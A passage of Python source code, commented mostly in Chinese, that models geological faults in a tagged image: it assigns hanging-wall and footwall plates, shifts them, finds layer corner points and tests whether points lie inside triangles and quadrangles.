distance_this_fault=Distance(this_fraction.center,pos_xy)\n distance_total_faults.append(distance_this_fault)\n \n #队距离和fault对象建立索引你关系\n map_distance_total_faults=dict(zip(distance_total_faults,total_faults))\n \n for this_fault in total_faults:\n \n #首先直接判断是否位于content内部\n if pos_IJ in this_fault.content:\n\n print('......')\n print('picking of the fault is over')\n \n if show:\n ShowEdge(this_fault,img_rgb)\n \n return this_fault\n \n #其次如果第一下没点上,通过计算距离远近来判断\n that_fraction=map_distance_total_faults[min(distance_total_faults)]\n\n print('......')\n print('picking of the fault is over')\n \n if show:\n ShowEdge(this_fraction,img_rgb)\n \n return that_fraction\n\n#============================================================================== \n\"\"\"移动plate相关函数\"\"\"\n#通过fault来确定上下盘\n#tag_layer是需要抽取layer的tag\n#now_img_tag表示现在tag矩阵\n#total_fractions是需要拆分的fraction集合\ndef PickUpAndDown(fault,total_fractions,now_img_tag,img_rgb,rgb_dict,\n show=False,text=False,output=False): \n \n layer_tag=list(rgb_dict.keys())\n \n #删除背景tag\n layer_tag.remove(0)\n \n #删除fault的tag\n layer_tag.remove(-1)\n \n #删除基底tag\n base_tag=GetBaseTag(now_img_tag)\n layer_tag.remove(base_tag)\n\n #从fractions中删除fault\n 
total_fractions_temp=copy.copy(total_fractions)\n    total_fractions_temp.remove(fault)\n    \n    #first determine the hanging wall, based on fault.edge\n    #left/right tag lists\n    tag_left,tag_right=[],[] \n    \n    #the left/right neighbours of points in fault.edge give the candidate tags \n    for pos in fault.edge:\n        \n        #coordinates of the left/right neighbours\n        pos_right=[pos[0],pos[1]+1] \n        pos_left=[pos[0],pos[1]-1]\n        \n        #left/right tags\n        tag_left.append(now_img_tag[pos_left[0],pos_left[1]]) \n        tag_right.append(now_img_tag[pos_right[0],pos_right[1]]) \n    \n    #deduplicate via set, back to list\n    tag_left=list(set(tag_left)) \n    tag_right=list(set(tag_right))\n    \n    #drop elements that are not layer tags\n    #left\n    tag_left_temp=[]\n    \n    for tag in tag_left:\n        if tag in layer_tag:\n            tag_left_temp.append(tag) \n    #right\n    tag_right_temp=[]\n    \n    for tag in tag_right:\n        if tag in layer_tag:\n            tag_right_temp.append(tag)\n    \n    tag_left,tag_right=tag_left_temp,tag_right_temp\n    \n    \"\"\"\n    Crucial step: decide which fractions belong to the hanging wall and which to the footwall.\n    The mapping between hanging/foot wall and left/right side is given by the fault dip:\n    dips left: the hanging wall is the left side\n    dips right: the hanging wall is the right side\n    Once left/right is known, each fraction in total_fractions is assigned by its center position.\n    \"\"\"\n    \n    #first collect the fractions on the left and right sides\n    #left/right fraction lists\n    fractions_left=[]\n    fractions_right=[]\n\n    for this_fraction in total_fractions:\n        #left side\n        if this_fraction.center[0]<fault.center[0]:\n            fractions_left.append(this_fraction)\n        \n        #right side\n        if this_fraction.center[0]>fault.center[0]:\n            fractions_right.append(this_fraction)\n    \n    #hanging wall and footwall fractions\n    fractions_up,fractions_down=[],[]\n\n    #initialize the dip direction\n    fault.Init(now_img_tag) \n    \n    #dips left: the left side is the hanging wall\n    if fault.inclination=='left':\n        \n        fractions_up=copy.deepcopy(fractions_left)\n        fractions_down=copy.deepcopy(fractions_right)\n        \n    #dips right: the right side is the hanging wall\n    if fault.inclination=='right':\n        \n        fractions_up=copy.deepcopy(fractions_right)\n        fractions_down=copy.deepcopy(fractions_left)\n    \n    #build the plate objects for the two walls\n    plate_up=o.plate()\n    plate_down=o.plate()\n    \n    #and initialize them\n    plate_up.Init(fractions_up)\n    plate_down.Init(fractions_down)\n    \n    #display \n    if show:\n        \n        #each wall separately\n        plate_up.Show(img_rgb,rgb_dict,text,output)\n        plate_down.Show(img_rgb,rgb_dict,text,output)\n        \n        #group picture\n        plates=[plate_up,plate_down]\n        ShowPlates(plates,img_rgb,rgb_dict,text,output)\n    \n    return plate_up,plate_down\n\n#==============================================================================  \n#one big function describing the walls that take part in the movement\ndef MovePlate(plate_up,plate_down,fault,img_tag,mode,show=False):\n    \n    #the tag of the top layer serves as the target\n    if plate_up.top.tag==plate_down.top.tag:\n        \n        target_tag=plate_up.top.tag\n    \n    #if the two top tags differ, take the younger layer as the target tag\n    else:\n        #tag sets of the 'others' on both walls\n        plate_up_others_tag,plate_down_others_tag=[],[]\n        \n        #fill the lists above\n        for this_fraction in plate_up.others:\n            \n            plate_up_others_tag.append(this_fraction.tag)\n            \n        for this_fraction in plate_down.others:\n            \n            plate_down_others_tag.append(this_fraction.tag)\n        \n        #decision rule:\n        #1) up's top occurs among down's others: use down's top\n        if plate_up.top.tag in plate_down_others_tag:\n            \n            target_tag=plate_down.top.tag\n            \n        #2) down's top occurs among up's others: use up's top\n        if plate_down.top.tag in plate_up_others_tag:\n            \n            target_tag=plate_up.top.tag  \n\n    #find the corner points for this tag\n    pos_top_up,pos_bottom_up,pos_top_down,pos_bottom_down=fault.AngleUpDown(target_tag,img_tag)\n    \n    #use the top or bottom reference points depending on mode\n    #top points as the reference\n    if mode=='top':\n        i_offset=pos_top_up[0]-pos_top_down[0]\n        j_offset=pos_top_up[1]-pos_top_down[1]\n    \n    #bottom points as the reference\n    if mode=='bottom':\n        i_offset=pos_bottom_up[0]-pos_bottom_down[0]\n        j_offset=pos_bottom_up[1]-pos_bottom_down[1]  \n\n    #up moves by -, down moves by +\n    #assume both walls move the same distance (other splits would also work)\n    plate_up.Move(-np.ceil(i_offset/2),-np.ceil(j_offset/2)) \n    plate_down.Move(np.ceil(i_offset/2),np.ceil(j_offset/2)) \n    \n    return plate_up,plate_down  \n    \n#compute the area of plates \n#plates means all plate objects\ndef Area(plates,target_tag,img_rgb,rgb_dict):\n    \n    #temporary canvas\n    img_temp=np.full(np.shape(img_rgb),img_rgb[0,0]) \n    \n    
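# Plan: paint every fraction of every plate onto this blank canvas, then count how many\n    # entries match the target colour; the comparison below is element-wise over the three\n    # channels, hence the division by np.shape(img_rgb)[-1] to convert matches to pixels.\n    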
#所有plate的content着色\n for this_plate in plates:\n \n for this_fraction in this_plate.fractions:\n \n for pos in this_fraction.content:\n \n i,j=pos[0],pos[1]\n img_temp[i,j]=rgb_dict[this_fraction.tag] \n \n #计算fractions的面积\n area=len(img_temp[img_temp==rgb_dict[target_tag]])/np.shape(img_rgb)[-1]\n \n return area\n\n#确定top和bottom模式\ndef ChooseMode(plates,fault,target_tag,img_tag,img_rgb,rgb_dict):\n \n #复制生成两种模式各自的自变量\n plates_top=copy.deepcopy(plates)\n plates_bottom=copy.deepcopy(plates)\n \n #移动\n plates_top=MovePlate(plates_top[0],plates_top[1],fault,img_tag,'top')\n plates_bottom=MovePlate(plates_bottom[0],plates_bottom[1],fault,img_tag,'bottom')\n\n #移动后面积\n area_top=Area(plates_top,target_tag,img_rgb,rgb_dict)\n area_bottom=Area(plates_bottom,target_tag,img_rgb,rgb_dict)\n \n #模式和面积的对应关系\n mode_area_dict={'top':area_top,'bottom':area_bottom}\n area_deficit=abs(area_top-area_bottom)\n \n #正断:取小\n if fault.polarity=='positive':\n \n mode=DictKeyOfValue(mode_area_dict,min(list(mode_area_dict.values()))) \n \n print('\\nto thicken the layer',area_deficit)\n \n #逆断:取大\n if fault.polarity=='negative':\n \n mode=DictKeyOfValue(mode_area_dict,max(list(mode_area_dict.values()))) \n \n print('\\nto fill the gap',area_deficit)\n \n return mode \n\n\"\"\"how to thicken and fill?\"\"\"\n\n#正式地移动plate函数\ndef TrueMove(plate_up,plate_down,fault,target_tag,\n img_tag,img_rgb,rgb_dict,show=False,text=False,output=False):\n \n #计算移动模式\n true_mode=ChooseMode([plate_up,plate_down],fault,target_tag,img_tag,img_rgb,rgb_dict)\n \n# print(true_mode)\n \n #正式地移动\n plates=MovePlate(plate_up,plate_down,fault,img_tag,true_mode)\n \n if show: \n #复制plates \n plates_to_show=copy.deepcopy(plates) \n \n ShowPlates(plates_to_show,img_rgb,rgb_dict,text,output)\n \n #显示单独层\n fractions_to_show=[]\n \n #将所有plate对象平移并显示\n for this_plate in plates:\n \n# 显示顶部\n fractions_to_show.append(this_plate.top)\n# \n# #显示底部\n# fractions_to_show+=this_plate.others\n\n ShowFractions(fractions_to_show,img_rgb,rgb_dict,text,output)\n \n return plates\n\n#============================================================================== \n#给所有layer对象赋予角点\n#输入layer_tag,遍历\n#对total_fractions进行操作\ndef PickAngle(total_fractions,img_tag):\n \n #建立layer���象集合\n Layer=[]\n \n #建立layer的tag集合\n layer_tag=[]\n \n #建立fault对象集合\n Fault=[]\n \n for this_fraction in total_fractions:\n \n if type(this_fraction) is o.layer:\n Layer.append(this_fraction)\n layer_tag.append(this_fraction.tag)\n \n if type(this_fraction) is o.fault:\n Fault.append(this_fraction)\n \n #转化为列表 \n layer_tag=list(set(layer_tag)) \n \n #全世界所有的angle点\n Angle_temp=[]\n\n \"\"\"1 收录layer与pad的边界点\"\"\"\n \n for this_layer in Layer:\n \n #edge的横纵坐标\n I_edge=[pos[0] for pos in this_layer.edge]\n J_edge=[pos[1] for pos in this_layer.edge]\n \n #找最小值\n J_min=min(J_edge)\n J_max=max(J_edge)\n \n #符合J最值的I列表与临时\n I_max_temp=[]\n I_min_temp=[]\n \n I_max=[]\n I_min=[]\n \n count=0\n\n for J in J_edge: \n \n #收录两端的点\n if J==J_max: \n I_max_temp.append(I_edge[count])\n \n if J==J_min: \n I_min_temp.append(I_edge[count]) \n \n count+=1 \n \n #1表示背景白色 \n I_max=[I for I in I_max_temp if img_tag[I,J_max+1]==1] \n I_min=[I for I in I_min_temp if img_tag[I,J_min-1]==1]\n \n #max I J 和 min I J 的排列组合\n \n #判断这种点是否存在\n if I_max!=[]:\n Angle_temp.append([max(I_max),J_max])\n Angle_temp.append([min(I_max),J_max])\n \n if I_min!=[]: \n Angle_temp.append([max(I_min),J_min])\n Angle_temp.append([min(I_min),J_min])\n \n \"\"\"2 收录layer与fault的边界点\"\"\" \n \n for target_tag in layer_tag:\n \n for this_fault in 
Fault:\n\n #边缘左侧点坐标列表\n edge_left=[]\n \n #边缘右侧点坐标列表\n edge_right=[]\n \n #fault.edge中符合左右tag值的即可 \n \n for pos in this_fault.edge:\n \n #左右tag值\n pos_left=[pos[0],pos[1]-1]\n pos_right=[pos[0],pos[1]+1]\n \n #左右点集合\n if img_tag[pos_left[0],pos_left[1]]==target_tag:\n edge_left.append(pos_left)\n \n if img_tag[pos_right[0],pos_right[1]]==target_tag:\n edge_right.append(pos_right) \n \n #左侧点的上下顶点\n I_left=[pos[0] for pos in edge_left]\n J_left=[pos[1] for pos in edge_left]\n \n #右侧点的上下顶点\n I_right=[pos[0] for pos in edge_right]\n J_right=[pos[1] for pos in edge_right] \n \n #不完全统计\n \n #左侧有点的情况 \n if I_left!=[] and J_left!=[]: \n \n #两个列表合成字典\n I_J_left=dict(zip(I_left,J_left))\n \n #寻找块体角点\n pos_top_left=[min(I_left),I_J_left[min(I_left)]]\n pos_bottom_left=[max(I_left),I_J_left[max(I_left)]]\n \n Angle_temp.append(pos_top_left)\n Angle_temp.append(pos_bottom_left)\n\n #右侧有点的情况 \n if I_right!=[] and J_right!=[]: \n\n #两个列表合成字典\n I_J_right=dict(zip(I_right,J_right))\n \n #寻找块体角点\n pos_top_right=[min(I_right),I_J_right[min(I_right)]]\n pos_bottom_right=[max(I_right),I_J_right[max(I_right)]]\n \n Angle_temp.append(pos_top_right)\n Angle_temp.append(pos_bottom_right) \n\n #并创建空列表 \n Angle=[]\n\n #清除相同的点 \n \n for pos in Angle_temp:\n \n if pos not in Angle: \n Angle.append(pos)\n \n \"\"\"在获取了潜在角点之后,对每个layer赋予真实角点,没分到角点的启用max-min机制生成角点\"\"\" \n \n return Angle\n\n#============================================================================== \n#标记某个点 \ndef ShowOnePoint(pos,length_of_side,img_rgb):\n \n #对正方形边赋值\n img_rgb[pos[0]-length_of_side,pos[1]-length_of_side:pos[1]+length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]+length_of_side,pos[1]-length_of_side:pos[1]+length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]-length_of_side:pos[0]+length_of_side,pos[1]-length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]-length_of_side:pos[0]+length_of_side,pos[1]+length_of_side]=np.array([0,0,0])\n \n #对正方形角赋值\n img_rgb[pos[0]-length_of_side,pos[1]-length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]+length_of_side,pos[1]-length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]-length_of_side,pos[1]+length_of_side]=np.array([0,0,0])\n img_rgb[pos[0]+length_of_side,pos[1]+length_of_side]=np.array([0,0,0])\n \n return img_rgb\n\ndef ShowAllAngle(Angle,length_of_side,img_rgb):\n\n #在角点处画正方形:上下length_of_side个像素点\n #pos[0]-10:pos[0]+10,pos[1]-10:pos[1]+10\n for pos in Angle: \n \n img_rgb=ShowOnePoint(pos,length_of_side,img_rgb)\n\n plt.imshow(img_rgb)\n\n#将总角点分配给各个layer \ndef DistributeAngle(Angle,Layer):\n \n #遍历每一个Angle坐标\n for pos in Angle:\n \n #遍历每一个layer对象\n for this_layer in Layer: \n if pos in this_layer.edge:\n \n #将拟角点集合中添加这个坐标\n this_layer.angle.append(pos)\n \n break\n \n#显示fraction对象的边界点\ndef ShowEdge(fraction,img_rgb):\n \n #对所有的边界点,赋予全0的rgb值\n for pos in fraction.edge:\n \n img_rgb[pos[0],pos[1]]=np.array([0,0,0])\n \n plt.imshow(img_rgb) \n \n#用于检验并显示某个layer的角点\ndef CheckAngle(which_layer,length_of_side,img_rgb):\n \n# #打印每一个点的坐标\n# print(which_layer.angle)\n# print(len(which_layer.angle))\n \n #标记出所有的角点\n for pos in which_layer.angle: \n img_rgb=ShowOnePoint(pos,length_of_side,img_rgb)\n \n #对所有的边界点,赋予全0的rgb值 \n for pos in which_layer.edge:\n img_rgb[pos[0],pos[1]]=np.array([0,0,0]) \n \n plt.imshow(img_rgb) \n \n#============================================================================== \n#写调整angle的函数\n#事后将其写进类里\n#计算两点之间的距离\ndef Distance(pos_A,pos_B):\n \n #判断pos_A,pos_B的数据类型,无论如何都转化为np.array\n if type(pos_A) is not np.array:\n pos_A=np.array(pos_A)\n \n if type(pos_B) is not np.array:\n 
pos_B=np.array(pos_B)\n \n return np.sqrt(np.sum((pos_A-pos_B)**2))\n\n#调整layer的angle\n#低版本\ndef AdjustAngle(which_layer,img_rgb):\n \n #确保角点数量大于4\n if len(which_layer.angle)>=4:\n \n pos_center=[which_layer.center[1],which_layer.center[0]]\n \n #然后以center为中心把layer分成四个象限\n #把angle分配到4个list当中\n \n for pos_angle in which_layer.angle:\n \n #下\n if pos_angle[0]>pos_center[0]:\n \n #左 下\n if pos_angle[1]<pos_center[1]: \n which_layer.bottom_left_list.append(pos_angle)\n \n #右 下 \n if pos_angle[1]>pos_center[1]: \n which_layer.bottom_right_list.append(pos_angle)\n \n #上\n if pos_angle[0]<pos_center[0]:\n \n #左 上\n if pos_angle[1]<pos_center[1]: \n which_layer.top_left_list.append(pos_angle)\n \n #右 上\n if pos_angle[1]>pos_center[1]: \n which_layer.top_right_list.append(pos_angle)\n #6.28\n \n #遍历四个角angle列表,计算和中心的距离\n \n #距离列表 \n all_distance=[[],[],[],[]]\n \n #四个角点列表\n all_list=[which_layer.bottom_left_list,\n which_layer.bottom_right_list,\n which_layer.top_left_list,\n which_layer.top_right_list]\n \n #四个最终角点\n all_angle=[]\n \n for k in range(len(all_distance)):\n \n #遍历角点列表\n for pos_angle in all_list[k]:\n \n #距离列表赋值\n all_distance[k].append(Distance(pos_angle,pos_center))\n \n if all_distance[k]!=[]:\n \n #建立距离和点的索引\n distance_angle=dict(zip(all_distance[k],all_list[k]))\n \n #对layer对象中的四大angle进行赋值\n all_angle.append(distance_angle[max(all_distance[k])])\n \n #若不符合条件,添加一个None\n \n else: \n all_angle.append(None)\n \n #赋值给类属性\n which_layer.bottom_left,\\\n which_layer.bottom_right,\\\n which_layer.top_left,\\\n which_layer.top_right\\\n =all_angle\n \n #6.29\n \n \"\"\"解决角点扎堆问题:退而��其次法\n 若某点为None,用which_layer.angle中的其他点来做替代\"\"\"\n #应当将两种方法合而为一\n \n #建立左右部分角点列表\n left_angle=[pos for pos in which_layer.angle if pos[1]<pos_center[1]] \n right_angle=[pos for pos in which_layer.angle if pos[1]>pos_center[1]] \n \n #左右深度\n left_depth=[pos[0] for pos in left_angle]\n right_depth=[pos[0] for pos in right_angle]\n \n #建立深度与角点坐标的列表\n left_depth_angle=dict(zip(left_depth,left_angle))\n right_depth_angle=dict(zip(right_depth,right_angle))\n \n #逐个点描述比较稳妥\n \n #左下\n if which_layer.bottom_left==None:\n which_layer.bottom_left=left_depth_angle[max(left_depth)]\n \n #右下\n if which_layer.bottom_right==None:\n which_layer.bottom_right=right_depth_angle[max(right_depth)]\n \n #左上\n if which_layer.top_left==None:\n which_layer.top_left=left_depth_angle[max(left_depth)]\n \n #右上\n if which_layer.top_right==None:\n which_layer.top_right=right_depth_angle[max(right_depth)] \n \n #重新定义(作图需要)\n all_angle=[which_layer.bottom_left,\n which_layer.bottom_right,\n which_layer.top_left,\n which_layer.top_right]\n \n #以下部分可写一个检验模块\n print('')\n \n #显示中心\n ShowOnePoint([int(pos_center[0]),int(pos_center[1])],3,img_rgb)\n \n #检查这些点的位置\n for pos in all_angle:\n print(pos)\n \n #方框标记出角点\n if pos!=None:\n ShowOnePoint(pos,3,img_rgb)\n \n plt.imshow(img_rgb)\n\n else:\n print('insufficient angles')\n \n#7.3 \n \n\"\"\"计算多边形面积,判断点是否在多边形内部相关问题\"\"\" \n#============================================================================== \n#计算三角形面积的函数(海伦公式)\n#pos_A,pos_B,pos_C为三角形三个顶点\ndef AreaTriangle(ABC):\n \n pos_A,pos_B,pos_C=ABC\n \n #计算三条边长\n AB=Distance(pos_A,pos_B)\n AC=Distance(pos_A,pos_C)\n CB=Distance(pos_C,pos_B)\n \n a,b,c=CB,AC,AB\n p=(a+b+c)/2\n \n return np.sqrt(p*(p-a)*(p-b)*(p-c))\n\n#判断点P在三角形内的函数\n#pos_P是参与判断的点\n#ABC是三角形的三个顶点列表,即ABC=[pos_A,pos_B,pos_C]\ndef PointInTriangle(pos_P,ABC):\n \n #还原ABC坐标\n pos_A,pos_B,pos_C=ABC\n \n #向量化\n pos_A=np.array(pos_A)\n pos_B=np.array(pos_B)\n pos_C=np.array(pos_C)\n \n 
pos_P=np.array(pos_P)\n \n #使用方法2\n method='2'\n \n #方法一:面积法\n if method=='1':\n\n Area_PAB=AreaTriangle([pos_A,pos_B,pos_P]) \n Area_PAC=AreaTriangle([pos_A,pos_P,pos_C]) \n Area_PBC=AreaTriangle([pos_P,pos_B,pos_C])\n \n Area_ABC=AreaTriangle([pos_A,pos_B,pos_C])\n Area_sum=Area_PAB+Area_PAC+Area_PBC\n \n \n #判断PAB,PAC,PBC的总面积和ABC是否相等(浮点数需用容差比较) \n if abs(Area_sum-Area_ABC)<1e-6:\n return True \n else:\n return False\n \n #方法二:向量法\n \n if method=='2':\n \n #向量法:_AP=u*_AC+v*_AB,其中_AP,_AB,_AC都是向量\n _AP=pos_A-pos_P\n \n _AC=pos_A-pos_C\n _AB=pos_A-pos_B\n \n #解方程组\n #_AP[0]=u*_AC[0]+v*_AB[0]\n #_AP[1]=u*_AC[1]+v*_AB[1]\n \n import sympy\n u=sympy.Symbol('u')\n v=sympy.Symbol('v')\n \n #得到的解是一个数组\n answer=sympy.solve([u*_AC[0]+v*_AB[0]-_AP[0],u*_AC[1]+v*_AB[1]-_AP[1]],[u,v])\n \n# print(answer[u],answer[v])\n \n u,v=answer[u],answer[v]\n \n #判断条件:0<=u<=1,0<=v<=1,0<=u+v<=1\n if 0<=u<=1 and 0<=v<=1 and 0<=u+v<=1:\n return True \n else:\n return False\n \n#============================================================================== \n#判断四边形的凹凸\ndef ConcaveOrConvexOfQuadrangle(ABCD):\n \n pos_ABCD=[]\n \n #转化为数组\n for pos in ABCD: \n pos_ABCD.append(list(pos))\n \n# print(pos_ABCD)\n \n #四个顶点的坐标\n pos_A,pos_B,pos_C,pos_D=pos_ABCD\n \n #生成一个列表表示各点在三角形内部与否的逻辑值列表\n bool_point_in_triangle_list=[]\n \n #判断四个点和其他三个点组成的三角形的位置关系\n for pos in pos_ABCD:\n \n #删取一个顶点\n pos_triangle_temp=pos_ABCD.copy()\n pos_triangle_temp.remove(pos)\n \n# print(pos)\n# print(pos_triangle_temp)\n \n #三个顶点生成三角形\n triangle_temp=o.triangle(pos_triangle_temp)\n \n# print(triangle_temp.area)\n \n #将逻辑值加入列表\n bool_point_in_triangle=triangle_temp.IncludePoint(pos)\n \n# print(bool_point_in_triangle)\n \n bool_point_in_triangle_list.append(bool_point_in_triangle)\n \n# print(bool_point_in_triangle_list)\n \n #判断是否有点不在三角形内\n if True in bool_point_in_triangle_list: \n return 'concave'\n else:\n return 'convex' \n \n#给四边形四个顶点以正确的链接顺序排序\ndef OrderOfQuadrangle(ABCD):\n \n #若四边形凹\n if ConcaveOrConvexOfQuadrangle(ABCD)=='concave':\n \n #重新给出合理坐标\n print('give the points in order')\n \n if ConcaveOrConvexOfQuadrangle(ABCD)=='convex':\n \n #排序后的答案\n pos_ABCD_ordered=[]\n \n pos_ABCD=[]\n \n #转化为数组\n for pos in ABCD: \n pos_ABCD.append(np.array(pos))\n \n #四个顶点的坐标\n pos_A,pos_B,pos_C,pos_D=pos_ABCD\n \n #排列组合库\n import itertools\n \n #下标集合\n index_total=[k for k in range(len(pos_ABCD))]\n \n #列表内是总元素,数字是元素数量\n index_list=list(itertools.combinations(index_total,2))\n \n #index表示任意两个点的下标\n for index_MN in index_list:\n \n #MN之外的另外两个拟对角点 \n index_UV=[index for index in index_total if index not in index_MN]\n \n# print(index_MN,index_UV)\n \n #MN表示拟对角线中的其中一条\n pos_M=pos_ABCD[index_MN[0]]\n pos_N=pos_ABCD[index_MN[1]]\n \n #UV表示拟对角线中的其中一条\n pos_U=pos_ABCD[index_UV[0]]\n pos_V=pos_ABCD[index_UV[1]]\n \n# print(pos_M,pos_N,pos_U,pos_V)\n# print((pos_M-pos_N)[0],(pos_M-pos_N)[1])\n \n #求MN和PQ的交点O \n #解方程组 \n#7.6 \n #先求一些系数\n a_MN=(pos_M-pos_N)[1]/(pos_M-pos_N)[0]\n b_MN=-1\n c_MN=pos_N[1]-pos_N[0]*a_MN\n \n a_UV=(pos_U-pos_V)[1]/(pos_U-pos_V)[0]\n b_UV=-1\n c_UV=pos_V[1]-pos_V[0]*a_UV\n \n #保留2位小数\n# a_MN,b_MN,c_MN=float('%0.2f' %a_MN),float('%0.2f' %b_MN),float('%0.2f '%c_MN)\n# a_UV,b_UV,c_UV=float('%0.2f '%c_UV),float('%0.2f' %b_UV),float('%0.2f' %a_UV)\n# \n# print(a_MN,b_MN,c_MN)\n# print(a_UV,b_UV,c_UV)\n \n import sympy\n \n x=sympy.Symbol('x')\n y=sympy.Symbol('y')\n \n #得到的解是一个数组\n answer=sympy.solve([x*a_MN+y*b_MN+c_MN,x*a_UV+y*b_UV+c_UV],[x,y])\n\n #若两条线平行,那么他们没有交点,因此解坐标不存在\n if answer!=[]:\n \n x,y=answer[x],answer[y]\n \n #O为对角线交点\n pos_O=np.array([x,y])\n\n# 
print(pos_O) \n# print(pos_M,pos_O,pos_N)\n# print(pos_U,pos_O,pos_V)\n \n #判断对角线交点在四边形内部还是在反向延长线上\n #好几种情况:升 降都有可能\n \n #MN \n pos_MN_max=[max(pos_M[0],pos_N[0]),max(pos_M[1],pos_N[1])]\n pos_MN_min=[min(pos_M[0],pos_N[0]),min(pos_M[1],pos_N[1])]\n \n #UV\n pos_UV_max=[max(pos_U[0],pos_V[0]),max(pos_U[1],pos_V[1])]\n pos_UV_min=[min(pos_U[0],pos_V[0]),min(pos_U[1],pos_V[1])]\n \n #判断坐标在区间内\n if pos_MN_min[0]<=pos_O[0]<pos_MN_max[0]\\\n and pos_MN_min[1]<=pos_O[1]<pos_MN_max[1]\\\n and pos_UV_min[0]<=pos_O[0]<pos_UV_max[0]\\\n and pos_UV_min[1]<=pos_O[1]<pos_UV_max[1]:\n \n #保留两位小数 \n x=float('%0.2f' %pos_O[0])\n y=float('%0.2f' %pos_O[1])\n \n pos_O=np.array([x,y])\n# print(pos_O) \n# print('correct point') \n \n #输出正确顺序的点\n pos_ABCD_ordered=[pos_M,pos_U,pos_N,pos_V]\n \n# print(pos_ABCD_ordered) \n \n break \n \n #正确答案非空 \n if pos_ABCD_ordered!=[]: \n return pos_ABCD_ordered\n \n#计算四边形面积的函数\ndef AreaQuadrangle(ABCD):\n \n #重新排列\n ABCD=OrderOfQuadrangle(ABCD)\n \n# print(ABCD)\n \n #转化为数组\n pos_ABCD=[]\n \n for pos in ABCD: \n pos_ABCD.append(list(pos))\n \n #分割成小三角形并计算面积\n \n #这三个点索引为012和023\n point_list_triangle_1=pos_ABCD.copy()\n point_list_triangle_2=pos_ABCD.copy()\n \n #需要删除的点:索引为1和3\n point_triangle_1=pos_ABCD[1]\n point_triangle_2=pos_ABCD[3]\n \n #删除点\n point_list_triangle_1.remove(point_triangle_1)\n point_list_triangle_2.remove(point_triangle_2)\n \n #求面积\n area_triangle_1=AreaTriangle(point_list_triangle_1)\n area_triangle_2=AreaTriangle(point_list_triangle_2)\n \n# print(ABCD[:-1])\n# print(ABCD[1:])\n# \n# print(area_triangle_1)\n# print(area_triangle_2)\n \n #四边形的总面积\n area_quadrangle=np.around(area_triangle_1+area_triangle_2,2)\n \n# print(area)\n \n return area_quadrangle\n \n#判断点是否在四边形内的函数\n#pos_P是检测点,ABCD为四边形的四个顶点\ndef PointInQuadrangle(pos_P,ABCD):\n\n #重新排列\n ABCD=OrderOfQuadrangle(ABCD)\n \n #转化为数组\n pos_ABCD=[]\n \n for pos in ABCD: \n pos_ABCD.append(list(pos))\n \n# print(pos_ABCD) \n \n #转化类型\n# pos_P=np.array(pos_P)\n \n#7.9\n \n #分别计算四个三角形的面积\n #临时列表存放ABCD的坐标\n pos_ABCD_temp=ABCD.copy()\n \n #小三角形定则总面积\n total_area_triangle=0\n \n #测点位于小三角形内部的情况逻辑值列表\n list_point_in_triangle=[]\n \n #想办法让首元素顶到尾部\n for k in range(len(pos_ABCD)):\n \n #第一个元素\n first_point=pos_ABCD_temp[0]\n \n #赋值顶点列表\n point_list_triangle=pos_ABCD_temp[0:2] \n \n #增加被检测点\n point_list_triangle.append(pos_P)\n \n #删除第一个元素并添加至末尾\n pos_ABCD_temp.remove(first_point)\n pos_ABCD_temp.append(first_point)\n \n# print(point_list_triangle)\n \n #小三角形的面积的总面积\n total_area_triangle+=AreaTriangle(point_list_triangle)\n \n #测点位于小三角形内部的情况\n list_point_in_triangle.append(PointInTriangle(pos_P,point_list_triangle))\n \n method=2\n \n #方法1:通过四个三角形总面积和四边形面积的关系来判断\n if method==1:\n \n #若小三角形总面积和四边形面积相等,那么说明被检测点在四边形内部\n area_quadrangle=AreaQuadrangle(ABCD)\n \n# print(area_quadrangle)\n# print(total_area_triangle)\n# \n #由于浮点型,两者在小数点后好几位会有所差别,所以需要四舍五入\n if np.round(total_area_triangle-area_quadrangle)==0:\n \n return True\n else:\n return False\n \n #方法2:通过点在四个三角形的情况来判断\n if method==2:\n \n #只要列表内部不存在False即可判断点在四边形内部\n if False not in list_point_in_triangle:\n \n return True\n else:\n return False\n \n#============================================================================== \n#对layer进行填坑或补齐\ndef FillGap(plate_up,plate_down,img_rgb,rgb_dict,show=False,output=False):\n \n plates=[plate_up,plate_down]\n \n #被填充的点\n gap=[]\n \n #以下为四个角点\n ABCD=[plate_up.top.bottom_right,\\\n plate_down.top.bottom_left,\\\n plate_up.top.top_right,\\\n plate_down.top.top_left]\n \n# print(ABCD)\n \n #在这四个点横纵坐标的最大范围内进行搜索\n I=[pos[0] 
for pos in ABCD]\n J=[pos[1] for pos in ABCD]\n \n I_max,I_min=max(I),min(I) \n J_max,J_min=max(J),min(J)\n \n# print(I_max,I_min,J_max,J_min)\n \n #判断是否在该四边形内部\n for i in range(I_min,I_max+1):\n for j in range(J_min,J_max+1):\n# print(whj.PointInQuadrangle([i,j],ABCD))\n #需要计算一段时间\n if PointInQuadrangle([i,j],ABCD):\n gap.append([i,j])\n \n if show:\n #最顶层的点集合\n content=[]\n \n for this_plate in plates:\n \n content+=this_plate.top.content\n target_tag=this_plate.top.tag\n \n content+=gap \n \n #print(len(content))\n \n #显示\n ShowSomething(img_rgb,content,target_tag,rgb_dict,output)\n \n return gap \n\n#7.10\n#============================================================================== \n#初始化fault倾角函数\ndef InitTilt(fault):\n \n #fault边缘点坐标\n I=[pos[0] for pos in fault.edge]\n J=[pos[1] for pos in fault.edge]\n \n #用I检索J\n I_J=dict(zip(I,J))\n \n #边缘集合中两侧存在layer_tag的最高点和最低点\n #由于纵坐标I是自上而下增长的,为描述方便,将其取相反数\n pos_top=np.array([-min(I),I_J[min(I)]])\n pos_bottom=np.array([-max(I),I_J[max(I)]])\n \n# print(pos_bottom)\n# print(pos_top)\n \n #斜率\n k=(pos_top-pos_bottom)[0]/(pos_top-pos_bottom)[1]\n \n #倾角\n tilt=180*np.arctan(abs(k))/np.pi\n \n return tilt,k\n\n#============================================================================== \n#plate对象转化为fractions\ndef Plate2Fractions(plate):\n \n #将top和others收录进来\n total_fractions=plate.others\n total_fractions.append(plate.top)\n \n return total_fractions\n\n#将plate对象沿着倾角方向切片\n#which_layer是被转化的layer\n#which_fault是划分上下盘的fault\n#width是切片宽度\ndef Layer2Chip(which_layer,which_fault,width,img_tag):\n\n #获取fault倾角和斜率\n tilt,k=InitTilt(which_fault)\n \n #取绝对值方便计算\n k=abs(k)\n \n #分别取layer中的最大值和最小值\n I=[pos[0] for pos in which_layer.edge]\n J=[pos[1] for pos in which_layer.edge]\n\n 